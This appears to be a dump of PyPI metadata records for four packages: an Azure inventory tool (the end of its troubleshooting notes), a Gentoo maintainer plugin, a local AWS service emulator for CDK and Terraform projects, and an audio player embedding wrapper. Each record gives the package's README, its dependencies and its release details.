- **`AuthorizationFailed` / `Forbidden` (ARM)** – confirm the identity has `Reader` (or `Resource Graph Reader`) on every subscription (or parent management group) you are scanning, and that your current Azure CLI context is pointing at a subscription you can read (`az account show`). - **`Resource Graph query failure`** – check that the tenant/subscription pair belongs to the same cloud you selected, and verify network egress to the relevant `resource_manager` endpoint (see `_ENVIRONMENT_MAP` in `azure_discovery.utils.azure_clients`). - **`403 Forbidden` / `Authorization_RequestDenied` / `Insufficient privileges` (Graph)** – this usually means required Microsoft Graph permissions were not admin-consented, or (for delegated runs) the signed-in user lacks the Entra admin role required for that dataset (commonly Conditional Access / Identity Protection). If you don't need those datasets, disable them with `--no-entra-include-conditional-access-policies` and/or `--no-entra-include-risky-users`. - **Risky users missing / empty** – the Identity Protection APIs require additional permissions and licensing (commonly Entra ID P2); if you don't have that, disable with `--no-entra-include-risky-users`. - **Defender for Cloud alerts/assessments empty** – verify Defender for Cloud is enabled on the subscription(s) being scanned. The tool gracefully handles subscriptions without Defender enabled (404 errors are logged as warnings). - **Preflight auth check (CLI)** – run `azure-discovery discover --tenant-id <tenant-guid> --validate-auth --probe-connectivity` to confirm the credential chain can acquire tokens for both ARM and Graph (note: this currently validates token acquisition only). - **`VisualizationError: Failed to render HTML graph`** – confirm the `--visualization-output-dir` path exists and is writable; the PyVis writer does not auto-create directories unless it has permissions on each parent. 
- **`401` or `interaction_required` errors** – when running non-interactively, use a service principal credential chain and set `AZURE_CLIENT_SECRET`; the default chain will otherwise attempt to launch an interactive browser flow. - **Empty graph output** – verify filters are not mutually exclusive (e.g., mixing include/exclude for the same type). - **No RBAC/PIM/Defender results when using `--no-include-azure-resources`** – the tool must know which subscriptions to enumerate. Pass `--subscription <sub-id>` (or set `subscriptions` in your config). If omitted, the tool resolves subscriptions from Azure; if that fails or returns none, RBAC/PIM/Defender phases run over zero subscriptions. ### PIM-Specific Issues - **`403 Forbidden` when enumerating Entra PIM eligibilities** – this indicates one or more permission/licensing issues: 1. **Missing Graph API permissions**: Ensure `RoleManagement.Read.Directory` or `RoleEligibilitySchedule.Read.Directory` is granted and admin-consented 2. **Missing Entra ID role**: For delegated scenarios, assign **Privileged Role Administrator** or **Global Reader** to the user 3. **Missing licensing**: PIM requires **Entra ID P2** or **Entra ID Governance** licensing - check your tenant's license status 4. **Verify permissions**: Run `az ad signed-in-user show` and check assigned roles, or use `az ad sp show --id <app-id>` for service principals - **`404 Not Found` when enumerating Azure Resource PIM eligibilities** – this means PIM is not configured for the subscription: 1. **Enable PIM for Azure resources**: In Entra ID → Privileged Identity Management → Azure resources → Discover resources 2. **Onboard subscription**: Select the subscription and click "Manage resource" to enable PIM 3. **Wait for propagation**: After enabling PIM, allow 5-10 minutes for the service to fully initialize - **PIM eligibilities returned but empty/zero results** – this is expected if no eligible assignments exist: 1. 
**Verify PIM assignments exist**: Check Entra ID → Privileged Identity Management → My roles / Azure resources to confirm eligible assignments 2. **Scope filtering**: If using `--pim-scope`, ensure the scope matches existing eligible assignments 3. **Role type filtering**: Eligible assignments are separate from active assignments - use both `--include-rbac-assignments` and `--include-pim` to see the complete picture - **`Failed to acquire Microsoft Graph token` for PIM** – authentication issue: 1. **Check authentication**: Run `az account show` to verify you're logged in 2. **Re-authenticate**: Run `az login --scope https://graph.microsoft.com/RoleManagement.Read.Directory` to explicitly consent 3. **Service principal**: Verify `AZURE_CLIENT_ID`, `AZURE_TENANT_ID`, and `AZURE_CLIENT_SECRET` are set correctly 4. **Token cache**: Try `az account clear` then `az login` again to refresh tokens - **PIM eligibilities missing for specific users** – check assignment configuration: 1. **Assignment type**: Only **eligible** assignments appear in PIM results (not active assignments) 2. **Expired eligibilities**: Check the `endDateTime` in the eligibility schedule - expired eligibilities are still returned but marked with status 3. **Group-based eligibilities**: If the user is eligible via group membership, ensu
text/markdown
David Frazer <david.frazer336@gmail.com>
null
null
null
null
azure, resource-graph, discovery, inventory, sovereign-cloud, visualization
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Topic :: System :: Systems Administration" ]
[]
null
null
>=3.11
[]
[]
[]
[ "pydantic>=2.7", "fastapi>=0.110", "uvicorn>=0.30", "typer>=0.12", "pyvis>=0.3.2", "msgraph-sdk>=1.0", "pyyaml>=6.0", "azure-identity>=1.17", "azure-mgmt-resourcegraph>=8.0", "azure-mgmt-subscription>=3.1", "azure-mgmt-authorization>=4.0", "azure-mgmt-security>=7.0", "rich-transient>=0.1.1",...
[]
[]
[]
[ "Documentation, https://github.com/maravedi/AzureDiscovery#readme", "Repository, https://github.com/maravedi/AzureDiscovery", "Bug Tracker, https://github.com/maravedi/AzureDiscovery/issues" ]
twine/6.2.0 CPython/3.12.10
2026-02-19T22:06:26.389706
azure_discovery-0.1.9.tar.gz
137,766
ff/f5/2fe369d7490555f150e42053d67927ab51e454a6cdad30c537714bbdcb0c/azure_discovery-0.1.9.tar.gz
source
sdist
null
false
af764655253d6beb5515349f5510f439
aa31f334dbe658674eb02909eb8d77922e412fd50af9250c5cab53ac9dbee747
fff52fe369d7490555f150e42053d67927ab51e454a6cdad30c537714bbdcb0c
MIT
[ "LICENSE" ]
221
2.4
find-work-repology
1.0.1
Personal advice utility for Gentoo package maintainers: Repology plugin
<!-- SPDX-FileCopyrightText: 2024 Anna <cyber@sysrq.in> --> <!-- SPDX-License-Identifier: CC0-1.0 --> find-work-repology ================== [find-work][find-work] is a utility for Gentoo repository maintainers that helps them find ebuilds to improve. This plugin adds commands that use Repology to find work. [find-work]: https://find-work.sysrq.in/ Installing ---------- ### Gentoo ```sh eselect repository enable guru emaint sync -r guru emerge dev-util/find-work-repology ``` ### Other systems `pip install find-work-repology --user` Packaging --------- You can track new releases using an [atom feed][atom] provided by PyPI. [atom]: https://pypi.org/rss/project/find-work-repology/releases.xml Contributing ------------ Patches and pull requests are welcome. Please use either [git-send-email(1)][1] or [git-request-pull(1)][2], addressed to <cyber@sysrq.in>. If you prefer a GitHub-style workflow, use the [mirror repo][gh] to send pull requests. Your commit message should conform to the following standard: ``` file/changed: Concise and complete statement of the purpose This is the body of the commit message. The line above is the summary. The summary should be no more than 72 chars long. The body can be more freely formatted, but make it look nice. Make sure to reference any bug reports and other contributors. Make sure the correct authorship appears. ``` [1]: https://git-send-email.io/ [2]: https://git-scm.com/docs/git-request-pull [gh]: http://github.com/cybertailor/find-work-plugins IRC --- You can join the `#find-work` channel either on [Libera Chat][libera] or [via Matrix][matrix]. [libera]: https://libera.chat/ [matrix]: https://matrix.to/#/#find-work:sysrq.in License ------- WTFPL
text/markdown
null
Anna <cyber@sysrq.in>
null
null
null
gentoo, ebuild, repository, maintainer, repology
[ "Development Status :: 5 - Production/Stable", "Environment :: Console", "Framework :: Pydantic", "Framework :: Pydantic :: 2", "Intended Audience :: Developers", "License :: DFSG approved", "Operating System :: POSIX", "Programming Language :: Python", "Programming Language :: Python :: 3", "Prog...
[]
null
null
>=3.11
[]
[]
[]
[ "click", "click-aliases", "find-work<2,>=1", "gentoopm<2", "pydantic<3,>=2", "repology-client<2,>=0.0.2", "sortedcontainers" ]
[]
[]
[]
[ "Changelog, https://git.sysrq.in/find-work-plugins/plain/find-work-repology/ChangeLog", "Home, https://find-work.sysrq.in/", "Issues, https://bugs.sysrq.in/enter_bug.cgi?product=Software&component=find-work", "Source, https://git.sysrq.in/find-work-plugins" ]
uv/0.9.15 {"installer":{"name":"uv","version":"0.9.15","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"'Gentoo'","version":"'2.18'","id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null}
2026-02-19T22:05:59.239423
find_work_repology-1.0.1.tar.gz
7,546
7c/51/e0d0a6a036fe2269497a5d38fb5995678cd8fae471b631d44d5f52ca5c06/find_work_repology-1.0.1.tar.gz
source
sdist
null
false
bc983b36116a2d6c01c9f358a04641b6
77b08912668d855d094a545e76e20cd08250bd9f26b4b476bdbf4bc142aa0051
7c51e0d0a6a036fe2269497a5d38fb5995678cd8fae471b631d44d5f52ca5c06
null
[]
223
2.4
local-web-services
0.17.2
Run AWS CDK applications locally - accelerate development with agentic code editors
# local-web-services Run your AWS CDK and Terraform applications locally. local-web-services reads your CDK cloud assembly or Terraform configuration and spins up local emulations of API Gateway, Lambda, DynamoDB, SQS, SNS, S3, Step Functions, Cognito, EventBridge, SSM Parameter Store, Secrets Manager, and more — so you can develop and test without deploying to AWS. ## Try It Out ### CDK Sample Project Clone the [CDK sample project](https://github.com/local-web-services/sample-project) — a serverless order processing system with API Gateway, Lambda, DynamoDB, SQS, S3, SNS, and Step Functions: ```bash git clone https://github.com/local-web-services/sample-project.git cd sample-project npm install npx cdk synth ``` Start the local environment: ```bash uvx --from local-web-services ldk dev ``` ### Terraform Sample Project Clone the [Terraform sample project](https://github.com/local-web-services/sample-project-terraform) — the same order processing system built with Terraform: ```bash git clone https://github.com/local-web-services/sample-project-terraform.git cd sample-project-terraform terraform init ``` Start the local environment, then apply: ```bash # Terminal 1: Start local services uvx --from local-web-services ldk dev # Terminal 2: Apply Terraform against local endpoints terraform apply -auto-approve ``` ### Interact with Local Services Open http://localhost:3000/_ldk/gui in your browser to see the GUI — you can watch request logs, browse DynamoDB tables, inspect S3 buckets, and interact with all your resources as you run through the steps below. 
In another terminal, create an order: ```bash uvx --from local-web-services lws apigateway test-invoke-method \ --resource /orders \ --http-method POST \ --body '{"customerName": "Alice", "items": ["widget", "gadget"], "total": 49.99}' ``` Start the order processing workflow: ```bash uvx --from local-web-services lws stepfunctions start-execution \ --name OrderWorkflow \ --input '{"orderId": "<ORDER_ID>", "items": ["widget", "gadget"], "total": 49.99}' ``` Check the workflow status: ```bash uvx --from local-web-services lws stepfunctions describe-execution --execution-arn <EXECUTION_ARN> ``` Retrieve the order: ```bash uvx --from local-web-services lws apigateway test-invoke-method \ --resource /orders/<ORDER_ID> \ --http-method GET ``` Store and retrieve configuration: ```bash uvx --from local-web-services lws ssm put-parameter \ --name /app/table-name --value orders --type String uvx --from local-web-services lws ssm get-parameter --name /app/table-name ``` Store and retrieve secrets: ```bash uvx --from local-web-services lws secretsmanager create-secret \ --name app/api-key --secret-string "my-secret-key" uvx --from local-web-services lws secretsmanager get-secret-value --secret-id app/api-key ``` Both sample projects include a full end-to-end test script (`test-orders.sh`) that runs all of these steps automatically. 
## Installation ### Docker (recommended for CI and teams) Images are published to the GitHub Container Registry for `linux/amd64` and `linux/arm64`: ```bash docker pull ghcr.io/local-web-services/local-web-services:latest ``` Mount your project directory and the Docker socket (required for Lambda execution): ```bash # Linux — use --network=host so all service ports are reachable docker run --rm \ -v $(pwd):/workspace \ -v /var/run/docker.sock:/var/run/docker.sock \ --network=host \ ghcr.io/local-web-services/local-web-services:latest # Mac / Windows — publish the port range explicitly docker run --rm \ -v $(pwd):/workspace \ -v /var/run/docker.sock:/var/run/docker.sock \ -p 3000-3025:3000-3025 \ ghcr.io/local-web-services/local-web-services:latest ``` Persist state across container restarts with a named volume: ```bash docker run --rm \ -v $(pwd)/cdk.out:/workspace/cdk.out \ -v lws-state:/workspace/.ldk \ -v /var/run/docker.sock:/var/run/docker.sock \ --network=host \ ghcr.io/local-web-services/local-web-services:latest ``` > **Note:** The image expects a pre-synthesised `cdk.out/` directory (run `npx cdk synth` first) or a Terraform project. Node.js and the CDK CLI are not included in the image. ### pip / uv local-web-services requires Python 3.11+, [uv](https://docs.astral.sh/uv/), and [Docker](https://docs.docker.com/get-docker/). ```bash uvx --from local-web-services ldk ``` Or install from source: ```bash git clone https://github.com/local-web-services/local-web-services.git cd local-web-services uv sync ``` ### Lambda Runtime Images Lambda functions run inside official AWS Lambda Docker images which include the AWS SDK pre-installed (`boto3` for Python, `@aws-sdk/*` for Node.js). 
Pull them once before first use: ```bash # Pull all supported Lambda runtime images uvx --from local-web-services ldk setup lambda # Or pull a specific runtime only uvx --from local-web-services ldk setup lambda --runtime python3.12 ``` ## Quick Start (Your Own Project) ### CDK Projects 1. Make sure your CDK project has been synthesized: ```bash cd your-cdk-project npx cdk synth ``` 2. Pull the Lambda runtime images (one-time setup): ```bash uvx --from local-web-services ldk setup lambda ``` 3. Start local-web-services: ```bash uvx --from local-web-services ldk dev --project-dir /path/to/your-cdk-project --port 3000 ``` `ldk` will discover your API routes, Lambda functions, DynamoDB tables, SQS queues, SNS topics, S3 buckets, Step Functions state machines, SSM parameters, and Secrets Manager secrets automatically from the CDK output. ### Terraform Projects 1. Initialize your Terraform project: ```bash cd your-terraform-project terraform init ``` 2. Pull the Lambda runtime images (one-time setup): ```bash uvx --from local-web-services ldk setup lambda ``` 3. Start local-web-services: ```bash uvx --from local-web-services ldk dev --project-dir /path/to/your-terraform-project ``` `ldk` auto-detects `.tf` files and starts all service providers in always-on mode. A `_lws_override.tf` file is generated to redirect the AWS provider to local endpoints. 4. Apply your Terraform configuration: ```bash terraform apply ``` Terraform creates resources (tables, queues, buckets, Lambda functions, API routes) against your local services. No AWS account needed. ### Mode Selection `ldk dev` auto-detects your project type. To force a specific mode: ```bash uvx --from local-web-services ldk dev --mode cdk # Force CDK mode uvx --from local-web-services ldk dev --mode terraform # Force Terraform mode ``` ## Supported Services Each service has two dimensions of support: **IaC constructs** parsed from your project, and **API operations** emulated at runtime. 
### DynamoDB **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_dynamodb.Table` | tableName, partitionKey, sortKey, globalSecondaryIndexes | **API Operations:** | Operation | Supported | |-----------|-----------| | PutItem | Yes | | GetItem | Yes | | DeleteItem | Yes | | UpdateItem | Yes | | Query | Yes | | Scan | Yes | | BatchGetItem | Yes | | BatchWriteItem | Yes | | CreateTable | Yes | | DeleteTable | Yes | | DescribeTable | Yes | | ListTables | Yes | | TransactGetItems | Yes | | TransactWriteItems | Yes | | UpdateTable | Yes | | DescribeContinuousBackups | Yes | | UpdateTimeToLive | Yes | Backed by SQLite. Supports expression attribute names/values, filter expressions, and eventual consistency simulation. ### SQS **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_sqs.Queue` | queueName, fifo, visibilityTimeout, contentBasedDeduplication, deadLetterQueue | **API Operations:** | Operation | Supported | |-----------|-----------| | SendMessage | Yes | | ReceiveMessage | Yes | | DeleteMessage | Yes | | CreateQueue | Yes | | DeleteQueue | Yes | | GetQueueUrl | Yes | | GetQueueAttributes | Yes | | SetQueueAttributes | Yes | | ListQueues | Yes | | PurgeQueue | Yes | | SendMessageBatch | Yes | | DeleteMessageBatch | Yes | | ChangeMessageVisibility | Yes | | ChangeMessageVisibilityBatch | Yes | | ListDeadLetterSourceQueues | Yes | Supports message attributes, long polling, and dead-letter queue wiring from RedrivePolicy. 
### S3 **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_s3.Bucket` | bucketName | **API Operations:** | Operation | Supported | |-----------|-----------| | PutObject | Yes | | GetObject | Yes | | DeleteObject | Yes | | HeadObject | Yes | | ListObjectsV2 | Yes | | CreateBucket | Yes | | DeleteBucket | Yes | | HeadBucket | Yes | | ListBuckets | Yes | | CopyObject | Yes | | DeleteObjects | Yes | | PutBucketTagging | Yes | | GetBucketTagging | Yes | | DeleteBucketTagging | Yes | | GetBucketLocation | Yes | | PutBucketPolicy | Yes | | GetBucketPolicy | Yes | | PutBucketNotificationConfiguration | Yes | | GetBucketNotificationConfiguration | Yes | | CreateMultipartUpload | No | Backed by the local filesystem. Supports event notifications (ObjectCreated, ObjectRemoved), presigned URL generation, ETags, and content-type headers. ### SNS **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_sns.Topic` | topicName | `aws_sns.Subscription` is not parsed. Subscriptions are wired at runtime via the API or auto-wired by local-web-services for Lambda/SQS targets. **API Operations:** | Operation | Supported | |-----------|-----------| | Publish | Yes | | Subscribe | Yes | | CreateTopic | Yes | | ListTopics | Yes | | ListSubscriptions | Yes | | DeleteTopic | Yes | | SetTopicAttributes | Yes | | Unsubscribe | Yes | | GetSubscriptionAttributes | Yes | | SetSubscriptionAttributes | Yes | | ConfirmSubscription | Yes | | ListSubscriptionsByTopic | Yes | Supports Lambda and SQS subscription protocols, message attributes, and fan-out to multiple subscribers. 
### EventBridge **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_events.EventBus` | eventBusName | | `aws_events.Rule` | ruleName, eventBus, eventPattern, schedule, targets | **API Operations:** | Operation | Supported | |-----------|-----------| | PutEvents | Yes | | PutRule | Yes | | PutTargets | Yes | | ListRules | Yes | | ListEventBuses | Yes | | RemoveTargets | Yes | | DeleteRule | Yes | | DescribeRule | Yes | | ListTargetsByRule | Yes | | EnableRule | Yes | | DisableRule | Yes | | TagResource | Yes | | UntagResource | Yes | | ListTagsForResource | Yes | Supports event pattern matching, schedule expressions (rate and cron), Lambda targets, and input transformations. ### Step Functions **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_stepfunctions.StateMachine` | stateMachineName, definitionBody, stateMachineType | **API Operations:** | Operation | Supported | |-----------|-----------| | StartExecution | Yes | | StartSyncExecution | Yes | | DescribeExecution | Yes | | ListExecutions | Yes | | ListStateMachines | Yes | | CreateStateMachine | Yes | | StopExecution | Yes | | GetExecutionHistory | Yes | | UpdateStateMachine | Yes | State types: Task, Pass, Choice, Wait, Succeed, Fail, Parallel, Map. Supports JSONPath (InputPath, OutputPath, ResultPath), error handling (Retry, Catch), and Standard & Express workflows. 
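The Step Functions state types and fields listed above can be combined into a minimal Amazon States Language definition. A sketch only — the Lambda ARN, state names, and input fields are placeholders, not taken from this project:

```json
{
  "Comment": "Hypothetical order-review workflow (illustrative only)",
  "StartAt": "CheckTotal",
  "States": {
    "CheckTotal": {
      "Type": "Choice",
      "Choices": [
        { "Variable": "$.total", "NumericGreaterThan": 100, "Next": "FlagForReview" }
      ],
      "Default": "Approved"
    },
    "FlagForReview": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:000000000000:function:FlagOrder",
      "ResultPath": "$.review",
      "Retry": [
        { "ErrorEquals": ["States.TaskFailed"], "MaxAttempts": 2 }
      ],
      "Next": "Approved"
    },
    "Approved": { "Type": "Succeed" }
  }
}
```

A definition like this — supplied via `CreateStateMachine` or a CDK `definitionBody` — exercises Choice branching, a Lambda-backed Task with `ResultPath` and `Retry`, and a terminal Succeed state.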
### Cognito **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_cognito.UserPool` | userPoolName, lambdaTriggers (preAuthentication, postConfirmation), passwordPolicy | | `aws_cognito.UserPoolClient` | userPool | **API Operations:** | Operation | Supported | |-----------|-----------| | SignUp | Yes | | ConfirmSignUp | Yes | | InitiateAuth | Yes (USER_PASSWORD_AUTH) | | JWKS endpoint | Yes | | CreateUserPoolClient | Yes | | DeleteUserPoolClient | Yes | | DescribeUserPoolClient | Yes | | ListUserPoolClients | Yes | | AdminCreateUser | Yes | | AdminDeleteUser | Yes | | AdminGetUser | Yes | | UpdateUserPool | Yes | | ListUsers | Yes | | ForgotPassword | No | | ChangePassword | No | | GlobalSignOut | No | Backed by SQLite. Supports JWT token generation (ID, access, refresh), user attributes, and password hashing. ### Lambda **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_lambda.Function` | handler, runtime, code, timeout, memorySize, environment | **Management API (Terraform mode):** | Operation | Supported | |-----------|-----------| | CreateFunction | Yes | | GetFunction | Yes | | DeleteFunction | Yes | | ListFunctions | Yes | | Invoke | Yes | | UpdateFunctionConfiguration | Yes | | UpdateFunctionCode | Yes | | TagResource | Yes | | UntagResource | Yes | | ListEventSourceMappings | Yes | Runs functions inside official AWS Lambda Docker images (with AWS SDK pre-installed). Run `ldk setup lambda` once to pull the images. Supports timeout enforcement, realistic context objects, and environment variable injection. In CDK mode, functions are discovered from the cloud assembly. In Terraform mode, functions are created dynamically via the management API. 
### API Gateway **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_apigateway.RestApi` | routes, methods, integrations | | `aws_apigatewayv2.HttpApi` | routes, integrations | **REST API (V1) Management:** CreateRestApi, GetRestApi, DeleteRestApi, CreateResource, PutMethod, PutIntegration, CreateDeployment, CreateStage. **HTTP API (V2) Management:** CreateApi, GetApi, DeleteApi, CreateRoute, CreateIntegration, CreateStage, ListRoutes, ListIntegrations, ListStages. Supports both REST API (V1) and HTTP API (V2) with Lambda proxy integration. Routes requests to local Lambda functions with path parameters, query parameters, and request/response mapping. ### ECS **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_ecs.TaskDefinition` | containerDefinitions | | `aws_ecs.FargateService` / `aws_ecs.Ec2Service` | taskDefinition | | `aws_elasticloadbalancingv2.ApplicationListenerRule` | conditions, actions | Runs services as local subprocesses. Supports health checking, service discovery, file watching with auto-restart, and port mapping. Supports local command overrides via `ldk.local_command` metadata. CDK mode only. ### IAM & STS Stub APIs that return AWS-compatible responses for Terraform compatibility. IAM role and policy operations are accepted and stored in memory (CreateRole, GetRole, DeleteRole, CreatePolicy, GetPolicy, DeletePolicy, AttachRolePolicy, DetachRolePolicy, CreatePolicyVersion, ListRoles, ListPolicies). STS returns dummy credentials and caller identity (GetCallerIdentity, AssumeRole). 
### SSM Parameter Store **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_ssm.StringParameter` | Name, Type, Value, Description | **API Operations:** | Operation | Supported | |-----------|-----------| | PutParameter | Yes | | GetParameter | Yes | | GetParameters | Yes | | GetParametersByPath | Yes | | DeleteParameter | Yes | | DeleteParameters | Yes | | DescribeParameters | Yes | | AddTagsToResource | Yes | | RemoveTagsFromResource | Yes | | ListTagsForResource | Yes | In-memory parameter store supporting String, StringList, and SecureString types. Supports versioning (auto-incremented on overwrite), descriptions, and tags. In CDK mode, parameters defined in the CloudFormation template are pre-seeded on startup. ### Secrets Manager **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_secretsmanager.Secret` | Name, Description, SecretString, GenerateSecretString | **API Operations:** | Operation | Supported | |-----------|-----------| | CreateSecret | Yes | | GetSecretValue | Yes | | PutSecretValue | Yes | | UpdateSecret | Yes | | DeleteSecret | Yes | | DescribeSecret | Yes | | ListSecrets | Yes | | RestoreSecret | Yes | | TagResource | Yes | | UntagResource | Yes | | ListSecretVersionIds | Yes | In-memory secret store supporting version staging (AWSCURRENT/AWSPREVIOUS), soft delete with optional recovery, and tags. In CDK mode, secrets defined in the CloudFormation template are pre-seeded on startup. ## IAM Authorization Test IAM authorization locally by configuring identities, permissions, and enforcement modes per service. When IAM auth is enabled, every request is evaluated against identity policies before reaching the service handler. 
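As an illustration of how a test identity might be expressed, here is a hypothetical `.lws/iam/identities.yaml` sketch. The field names below are an assumption modeled on standard IAM policy statements, not the documented schema:

```yaml
# Hypothetical sketch — field names are assumptions, not the documented schema
identities:
  readonly-role:
    policies:
      - Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Action:
              - "dynamodb:GetItem"
              - "dynamodb:Query"
            Resource: "*"
```

With an identity like this active, write operations such as `PutItem` would be denied in enforce mode and logged as violations in audit mode.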
```bash # Check current IAM auth configuration uvx --from local-web-services lws iam-auth status # Enable enforce mode for a service (requests without permission are denied) uvx --from local-web-services lws iam-auth enable dynamodb # Enable audit mode (requests pass through but violations are logged) uvx --from local-web-services lws iam-auth set dynamodb --mode audit # Disable IAM auth for a service uvx --from local-web-services lws iam-auth disable dynamodb # Switch the active identity (useful for testing different roles) uvx --from local-web-services lws iam-auth set-identity readonly-role ``` Identities and permissions are defined in YAML files under `.lws/iam/`: - **`.lws/iam/identities.yaml`** — named identities with inline policies and optional boundary policies - **`.lws/iam/permissions.yaml`** — maps service operations to required IAM actions (merged on top of built-in defaults) - **`.lws/iam/resource_policies.yaml`** — per-resource policies (e.g., bucket policies for S3) Configure IAM auth globally or per-service in `ldk.yaml`: ```yaml iam_auth: mode: enforce # enforce | audit | disabled (default: disabled) default_identity: admin-user services: dynamodb: mode: enforce s3: mode: audit ``` Supported services: dynamodb, sqs, s3, sns, events, stepfunctions, cognito-idp, ssm, secretsmanager. IAM and STS are excluded from auth middleware to avoid bootstrap issues. ## Agent Setup If you use a coding agent (Claude Code, etc.), run `lws init` to scaffold agent configuration into your project: ```bash uvx --from local-web-services lws init --project-dir /path/to/your-project ``` This creates: - **CLAUDE.md** snippet with lws quick reference and common commands - **Custom slash commands** (`/lws:mock`, `/lws:chaos`, and `/lws:iam-auth`) that guide your agent through mock, chaos, and IAM auth workflows ## AWS Operation Mocking Mock specific AWS operations to return canned responses during local development. 
This lets you control exactly what your Lambda functions or application receives — useful for testing error handling, edge cases, or complex multi-service flows. ```bash # Create a persistent mock definition uvx --from local-web-services lws aws-mock create my-s3-mock --service s3 # Add an operation rule (returns custom response for get-object) uvx --from local-web-services lws aws-mock add-operation my-s3-mock \ --operation get-object --body-string "mocked file content" # Or configure at runtime (requires ldk dev running) uvx --from local-web-services lws aws-mock set-rules dynamodb \ --operation get-item --status 200 --body '{"Item": {"id": {"S": "mock-123"}}}' # Check mock status uvx --from local-web-services lws aws-mock status ``` Supported services: dynamodb, sqs, s3, sns, events, stepfunctions, cognito-idp, ssm, secretsmanager. Supports header-based filtering to mock only specific request patterns. ## Chaos Engineering Inject failures into AWS service calls to test application resilience: ```bash # Enable chaos for DynamoDB with 50% error rate uvx --from local-web-services lws chaos enable dynamodb uvx --from local-web-services lws chaos set dynamodb --error-rate 0.5 # Add latency to S3 calls uvx --from local-web-services lws chaos enable s3 uvx --from local-web-services lws chaos set s3 --latency-min 200 --latency-max 500 # Check chaos status uvx --from local-web-services lws chaos status # Disable when done uvx --from local-web-services lws chaos disable dynamodb ``` Chaos parameters: `--error-rate`, `--latency-min`, `--latency-max`, `--timeout-rate`, `--connection-reset-rate`. ## Development All development tasks are available through `make`: ```bash make install # Install dependencies make test # Run test suite make lint # Run linter make format # Auto-format code make check # Run all checks (lint, format, complexity, tests) ``` Run `make` with no arguments to see all available targets. 
## Documentation Visit [https://local-web-services.github.io/www/](https://local-web-services.github.io/www/) for full documentation. ## Contributing See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines on how to contribute. ## License This project is licensed under the MIT License. See [LICENSE](LICENSE) for details.
text/markdown
null
null
null
null
null
agentic, ai, aws, cdk, code-editor, development, dynamodb, lambda, local, s3, secretsmanager, sns, sqs, ssm, vibe-coding
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Topic :: Software Develop...
[]
null
null
>=3.11
[]
[]
[]
[ "aiosqlite>=0.20.0", "croniter>=2.0.0", "docker>=7.0.0", "fastapi>=0.110.0", "httpx>=0.27.0", "pyjwt[crypto]>=2.8.0", "python-multipart>=0.0.9", "pyyaml>=6.0", "rich>=13.0.0", "typer>=0.9.0", "uvicorn[standard]>=0.27.0", "watchdog>=4.0.0", "allure-pytest-bdd>=2.13.0; extra == \"dev\"", "bl...
[]
[]
[]
[ "Homepage, https://local-web-services.github.io/www", "Repository, https://github.com/local-web-services/local-web-services", "Issues, https://github.com/local-web-services/local-web-services/issues" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:05:04.523822
local_web_services-0.17.2.tar.gz
906,455
ad/76/f0ca8271c66a49f4074d7f099bd38fa45cb3204b9eb6082fd7e19e45220f/local_web_services-0.17.2.tar.gz
source
sdist
null
false
ad23ee65b09b00e88724578a8ee624fc
1da36c35c5d4694112c6d355825e327c539c5c34bc5b927f0bbec6e31b074229
ad76f0ca8271c66a49f4074d7f099bd38fa45cb3204b9eb6082fd7e19e45220f
MIT
[ "LICENSE" ]
253
2.4
audio-workbench
0.1.0
Python wrapper for Audio Workbench Player (HTML/Streamlit embedding)
# audio-workbench (Python wrapper) Python helper package to embed `audio-workbench` in Streamlit, Jupyter, and other HTML-capable UIs. ## Install (PyPI) ```bash pip install audio-workbench ``` Optional demo dependencies: ```bash pip install "audio-workbench[streamlit]" pip install "audio-workbench[gradio]" ``` ## Install (local dev) ```bash pip install -e . ``` ## Usage ```python from audio_workbench import render_daw_player html = render_daw_player( audio_bytes, iframe_height=320, viewMode="spectrogram", transportStyle="hero", transportOverlay=True, showOverview=False, showFileOpen=False, showStatusbar=False, ) ``` ## Demo Features - Presets: `Full DAW`, `Compact`, `Preview Waveform Hero`, `Preview Spectrogram Hero`, `Ultra Compact Hero` - Advanced toggles for all relevant player sections - Live options preview as JSON ## Streamlit demo ```bash streamlit run demo_streamlit.py ``` ## Gradio demo ```bash pip install gradio python demo_gradio.py ``` ## License GNU AGPL-3.0
text/markdown
Perch Contributors
null
null
null
null
audio, player, streamlit, jupyter, embed, waveform, spectrogram
[ "Development Status :: 4 - Beta", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Operating System :: OS Independent" ]
[]
null
null
>=3.9
[]
[]
[]
[ "streamlit>=1.30; extra == \"streamlit\"", "gradio>=4.0; extra == \"gradio\"" ]
[]
[]
[]
[ "Homepage, https://github.com/LimitlessGreen/Audio-Workbench", "Repository, https://github.com/LimitlessGreen/Audio-Workbench", "Issues, https://github.com/LimitlessGreen/Audio-Workbench/issues" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T22:04:50.688004
audio_workbench-0.1.0.tar.gz
70,126
f3/22/e227252e7b439d8da4f09b4a88627d648947301a352188e00b8adb9e08e1/audio_workbench-0.1.0.tar.gz
source
sdist
null
false
5ed140e70b49beb425e662f732e4f602
